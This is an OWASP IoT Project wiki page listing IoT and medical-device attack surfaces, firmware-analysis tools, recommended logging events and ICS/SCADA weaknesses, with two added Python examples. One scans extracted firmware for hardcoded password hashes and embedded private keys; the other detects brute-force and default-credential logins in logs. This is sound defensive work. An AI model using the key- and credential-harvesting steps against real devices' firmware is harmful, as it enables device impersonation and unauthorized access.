== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
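The "File system analysis" step above, and the "Firmware and storage extraction" row of the IoT Vulnerabilities table (firmware shipping pre-set passwords and SSH keys), can be illustrated with a small audit script. This is an added example, not the project's own code and not Firmwalker; it uses only the Python standard library. It assumes the firmware has already been unpacked into a root filesystem directory (for instance by binwalk -e). Running it over several images of the same product line also surfaces the "same certificate used on multiple devices" finding by comparing fingerprints of the embedded PEM material. The two mini images it builds for the demo are constructed samples: the PEM bodies are placeholders, not real keys, and the shadow entries are invented.<br />

```python
"""Audit extracted firmware root filesystems for hardcoded credentials,
embedded private keys, and TLS material shared across images.
Added example; stdlib only."""
import hashlib
import os
import re
import tempfile

# A PEM block; the backreference forces the BEGIN/END kinds to match.
PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
WEAK_HASH_PREFIXES = ("$1$",)   # md5crypt; a bare 13-char field is legacy DES crypt


def scan_pem(text):
    """Return (kind, sha256 of the base64 body) for every PEM block in text.
    Stripping whitespace first makes the fingerprint independent of line
    wrapping, so identical material matches across images."""
    return [(kind, hashlib.sha256("".join(body.split()).encode()).hexdigest())
            for kind, body in PEM_RE.findall(text)]


def scan_shadow(text):
    """Classify crypt(3) password fields from etc/shadow or etc/passwd.
    Any hash baked into an image is a hardcoded credential (every unit ships
    with it); empty fields and weak schemes are called out separately."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append((user, "empty password"))
        elif pw in ("*", "!", "!!", "x"):
            continue  # locked account, or a passwd entry deferring to shadow
        elif pw.startswith(WEAK_HASH_PREFIXES) or (len(pw) == 13 and "$" not in pw):
            findings.append((user, "weak hash"))
        else:
            findings.append((user, "hardcoded hash"))
    return findings


def audit_rootfs(root):
    """Walk one extracted root filesystem and collect findings by category."""
    report = {"credentials": [], "private_keys": [], "certificates": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            if rel in ("etc/shadow", "etc/passwd"):
                report["credentials"] += [(rel, u, f) for u, f in scan_shadow(text)]
            for kind, fp in scan_pem(text):
                if "PRIVATE KEY" in kind:
                    report["private_keys"].append((rel, fp))
                elif kind == "CERTIFICATE":
                    report["certificates"].append((rel, fp))
    return report


def shared_material(reports):
    """Map each certificate/key fingerprint found in more than one image to the
    images containing it: the 'same certificate on multiple devices' case."""
    seen = {}
    for image, rep in reports.items():
        for _, fp in rep["certificates"] + rep["private_keys"]:
            seen.setdefault(fp, set()).add(image)
    return {fp: sorted(imgs) for fp, imgs in seen.items() if len(imgs) > 1}


# Constructed demo material: placeholder PEM bodies (not real keys) and an
# invented shadow file with a md5crypt root hash and a password-less admin.
FAKE_CERT = "-----BEGIN CERTIFICATE-----\nMIIBplaceholdercert\n-----END CERTIFICATE-----\n"
FAKE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEplaceholderkey\n-----END RSA PRIVATE KEY-----\n"
SAMPLE_SHADOW = ("root:$1$abcdefgh$ijklmnopqrstuvwxyz012:17000:0:99999:7:::\n"
                 "admin::17000:0:99999:7:::\n"
                 "nobody:*:17000:0:99999:7:::\n")


def build_sample_images(base):
    """Write two mini root filesystems that ship identical TLS material."""
    roots = []
    for image in ("image_v1", "image_v2"):
        root = os.path.join(base, image)
        os.makedirs(os.path.join(root, "etc", "ssl"))
        for rel, content in (("etc/shadow", SAMPLE_SHADOW),
                             ("etc/ssl/server.crt", FAKE_CERT),
                             ("etc/ssl/server.key", FAKE_KEY)):
            with open(os.path.join(root, *rel.split("/")), "w") as fh:
                fh.write(content)
        roots.append(root)
    return roots


def demo():
    """Audit the two constructed images; returns (per-image reports, shared material)."""
    base = tempfile.mkdtemp(prefix="fw-audit-")
    reports = {os.path.basename(r): audit_rootfs(r) for r in build_sample_images(base)}
    return reports, shared_material(reports)
```

For a real assessment, point audit_rootfs at each unpacked image and pass the resulting dictionary to shared_material; a fingerprint that appears in every image means the private key is recoverable from any one unit and can impersonate all of them. The script deliberately does not parse certificates (expiry and subject checks need an X.509 parser such as openssl x509), so pair it with the tools listed above for that step.<br />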
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
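As an added example (not part of the project, and not a vendor's log format), the following Python script shows how a handful of the events in the table above become concrete detection rules when run over device logs. The line format, the thresholds, the enrollment sets and every sample log line are constructed for this example. It covers "Multiple Failed Passwords" and "High Rate of Login Attempts" with per-user and per-source sliding windows, "Device Accessed Using Default Administrative Credentials" from a flag the device is assumed to emit when the stored password still equals the factory default, and the two ecosystem-membership events by checking the sending device against enrolled and disenrolled sets.<br />

```python
"""Detection rules for a subset of the recommended IoT logging events,
run over constructed sample log lines (added example, not project code)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed line format (an assumption for this example, not a vendor format):
#   <ISO-8601 UTC timestamp> <event type> key=value ...
SAMPLE_LOG = """\
2019-11-01T07:00:00Z AUTH src=10.0.0.5 user=admin result=fail
2019-11-01T07:00:01Z AUTH src=10.0.0.5 user=admin result=fail
2019-11-01T07:00:02Z AUTH src=10.0.0.5 user=admin result=fail
2019-11-01T07:00:03Z AUTH src=10.0.0.5 user=admin result=fail
2019-11-01T07:00:04Z AUTH src=10.0.0.5 user=admin result=fail
2019-11-01T07:00:05Z AUTH src=10.0.0.5 user=admin result=ok default_cred=1
2019-11-01T07:05:00Z AUTH src=10.0.0.9 user=alice result=ok
2019-11-01T07:06:00Z ECO src=10.0.0.77 device=sensor-0042 msg=heartbeat
2019-11-01T07:06:30Z ECO src=10.0.0.23 device=sensor-0007 msg=heartbeat
2019-11-01T07:06:45Z ECO src=10.0.0.31 device=sensor-0099 msg=heartbeat
"""

# Ecosystem membership state; a real detector would read this from the
# enrollment service. Hardcoded here for the demo.
ENROLLED = {"sensor-0007"}
DISENROLLED = {"sensor-0042"}

FAILED_PW_THRESHOLD = 3   # failed logins per user within WINDOW
RATE_THRESHOLD = 5        # login attempts (any result) per source within WINDOW
WINDOW = timedelta(seconds=30)


def parse_line(line):
    """Parse one constructed log line into a dict."""
    ts, event, *kvs = line.split()
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "event": event}
    for kv in kvs:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def _slide(window, now):
    """Append now, drop timestamps older than WINDOW, return the count."""
    window.append(now)
    while now - window[0] > WINDOW:
        window.popleft()
    return len(window)


def detect(lines):
    """Return (timestamp, event name, subject) for each triggered event.
    Sliding windows mean a slow trickle of failures does not fire, and each
    threshold fires once when crossed rather than on every further attempt."""
    alerts = []
    fails_by_user = defaultdict(deque)
    attempts_by_src = defaultdict(deque)
    for line in lines:
        if not line.strip():
            continue
        r = parse_line(line)
        if r["event"] == "AUTH":
            if _slide(attempts_by_src[r["src"]], r["ts"]) == RATE_THRESHOLD:
                alerts.append((r["ts"], "High Rate of Login Attempts", r["src"]))
            if r["result"] == "fail":
                if _slide(fails_by_user[r["user"]], r["ts"]) == FAILED_PW_THRESHOLD:
                    alerts.append((r["ts"], "Multiple Failed Passwords", r["user"]))
            elif r.get("default_cred") == "1":
                alerts.append((r["ts"],
                               "Device Accessed Using Default Administrative Credentials",
                               r["user"]))
        elif r["event"] == "ECO":
            device = r["device"]
            if device in DISENROLLED:
                alerts.append((r["ts"], "Traffic Seen from Disenrolled System", device))
            elif device not in ENROLLED:
                alerts.append((r["ts"], "Traffic Seen from Unenrolled System", device))
    return alerts


def run_demo():
    """Run the rules over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ts, name, subject in run_demo():
        print(ts.isoformat(), name, subject)
```

Against the sample log the rules fire five times: the failed-password rule on the third failure, the rate rule on the fifth attempt from the same source, the default-credential rule on the successful login, and one membership event each for the disenrolled and the never-enrolled sensor. Note that the default-credential event depends on the device itself logging that fact; a collector cannot infer it from a plain "login ok" record, which is why the table lists it as a device-side event.<br />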
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems generally log far too few events to feed a solid detection and response program, and companies that want to build one have few good references for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an IRS-approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write interoperable applications regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
'''RSA Conference San Francisco'''<br />
* [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project]<br />
* Daniel Miessler, Practice Principal<br />
* April 21, 2015<br />
<br />
'''Defcon 23'''<br />
* [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping]<br />
* Daniel Miessler<br />
* August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
